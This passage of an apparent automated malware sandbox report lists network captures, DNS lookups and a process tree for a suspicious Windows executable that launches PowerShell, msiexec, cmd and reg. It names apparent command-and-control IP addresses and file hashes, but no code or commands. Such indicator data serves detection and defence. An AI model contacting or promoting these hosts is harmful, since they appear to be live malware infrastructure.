Oct 6, 2024 11:47:05.206250906 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.206605911 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206692934 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206867933 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.206939936 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206964970 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207212925 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207740068 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.207827091 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.207938910 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207940102 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207940102 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208015919 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208054066 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.208172083 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208239079 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208784103 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.208802938 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.208939075 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209076881 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209084988 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209103107 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209117889 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209135056 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209275007 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209275007 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209424973 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209444046 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209613085 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210342884 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210364103 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210516930 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210516930 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210545063 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210561991 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210654974 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210728884 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210740089 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210843086 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210908890 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210908890 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210938931 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.211169958 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:10.254287958 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.533413887 CEST | 3980 | 49769 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:10.533767939 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.534594059 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.745951891 CEST | 3980 | 49769 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:10.858428001 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:11.871938944 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:13.887119055 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:17.901822090 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:25.915685892 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:33.058794975 CEST | 49773 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:33.264039993 CEST | 3980 | 49773 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:33.264236927 CEST | 49773 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:33.265039921 CEST | 49773 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:33.471057892 CEST | 3980 | 49773 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:33.472913980 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:34.476418972 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:36.491615057 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:40.506438017 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:48.520194054 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 6, 2024 11:47:02.905457973 CEST | 57277 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:03.312587023 CEST | 53 | 57277 | 1.1.1.1 | 192.168.11.20 |
Oct 6, 2024 11:47:10.142237902 CEST | 59893 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:10.252559900 CEST | 53 | 59893 | 1.1.1.1 | 192.168.11.20 |
Oct 6, 2024 11:47:10.747122049 CEST | 54980 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:10.856147051 CEST | 53 | 54980 | 1.1.1.1 | 192.168.11.20 |
Oct 6, 2024 11:47:31.934254885 CEST | 55610 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:32.045561075 CEST | 53 | 55610 | 1.1.1.1 | 192.168.11.20 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 6, 2024 11:47:02.905457973 CEST | 192.168.11.20 | 1.1.1.1 | 0xe710 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 6, 2024 11:47:10.142237902 CEST | 192.168.11.20 | 1.1.1.1 | 0xcfa1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 6, 2024 11:47:10.747122049 CEST | 192.168.11.20 | 1.1.1.1 | 0x76dc | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 6, 2024 11:47:31.934254885 CEST | 192.168.11.20 | 1.1.1.1 | 0x3008 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 6, 2024 11:47:03.312587023 CEST | 1.1.1.1 | 192.168.11.20 | 0xe710 | No error (0) | 85.120.16.93 | A (IP address) | IN (0x0001) | false | ||
Oct 6, 2024 11:47:10.252559900 CEST | 1.1.1.1 | 192.168.11.20 | 0xcfa1 | No error (0) | 192.169.69.26 | A (IP address) | IN (0x0001) | false | ||
Oct 6, 2024 11:47:10.856147051 CEST | 1.1.1.1 | 192.168.11.20 | 0x76dc | No error (0) | 45.74.58.7 | A (IP address) | IN (0x0001) | false | ||
Oct 6, 2024 11:47:32.045561075 CEST | 1.1.1.1 | 192.168.11.20 | 0x3008 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.11.20 | 49768 | 85.120.16.93 | 443 | 1264 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-06 09:47:03 UTC | 189 | OUT | |
2024-10-06 09:47:04 UTC | 499 | IN | |
2024-10-06 09:47:04 UTC | 869 | IN | |
2024-10-06 09:47:04 UTC | 14994 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 521 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 05:46:28 |
Start date: | 06/10/2024 |
Path: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 776'478 bytes |
MD5 hash: | 02F086FB54D58BF17B51564B34166F5E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 05:46:29 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x860000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 05:46:29 |
Start date: | 06/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ab9d0000 |
File size: | 875'008 bytes |
MD5 hash: | 81CA40085FC75BABD2C91D18AA9FFA68 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 05:46:54 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 05:46:54 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 05:46:54 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 05:47:01 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa60000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 05:47:01 |
Start date: | 06/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ab9d0000 |
File size: | 875'008 bytes |
MD5 hash: | 81CA40085FC75BABD2C91D18AA9FFA68 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 05:47:01 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x880000 |
File size: | 59'392 bytes |
MD5 hash: | CDD462E86EC0F20DE2A1D781928B1B0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 05:47:13 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\WerFault.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 482'640 bytes |
MD5 hash: | 40A149513D721F096DDF50C04DA2F01F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 15 |
Start time: | 05:47:45 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\WerFault.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 482'640 bytes |
MD5 hash: | 40A149513D721F096DDF50C04DA2F01F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Execution Graph
Execution Coverage: | 23.7% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.8% |
Total number of Nodes: | 1320 |
Total number of Limit Nodes: | 32 |
Graph
Function 0040338F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404722 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 275stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062DC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C97 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004053F5 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405D8B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404231 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404253 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406B15 Relevance: .3, Instructions: 334COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0305EAE0 Relevance: .3, Instructions: 258COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0305EAF0 Relevance: .3, Instructions: 252COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0305E280 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0305E290 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076ECAE6 Relevance: 1.4, Instructions: 1449COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E5230 Relevance: 1.1, Instructions: 1099COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E3878 Relevance: .9, Instructions: 904COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E520E Relevance: .9, Instructions: 893COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E469A Relevance: .9, Instructions: 888COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076ED8C6 Relevance: .8, Instructions: 839COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E385A Relevance: .8, Instructions: 835COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 08FC16C8 Relevance: .7, Instructions: 678COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E4866 Relevance: .6, Instructions: 647COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076EDA87 Relevance: .6, Instructions: 627COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E1228 Relevance: .6, Instructions: 599COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076EDD1C Relevance: .4, Instructions: 435COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076EDB11 Relevance: .4, Instructions: 431COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E4BB1 Relevance: .3, Instructions: 311COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 08FC1C24 Relevance: .2, Instructions: 206COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 08FC1C38 Relevance: .2, Instructions: 201COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E0C68 Relevance: .2, Instructions: 170COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0305F748 Relevance: .2, Instructions: 155COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0305F738 Relevance: .2, Instructions: 151COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E8A15 Relevance: .1, Instructions: 134COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E0AF0 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 076E5078 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
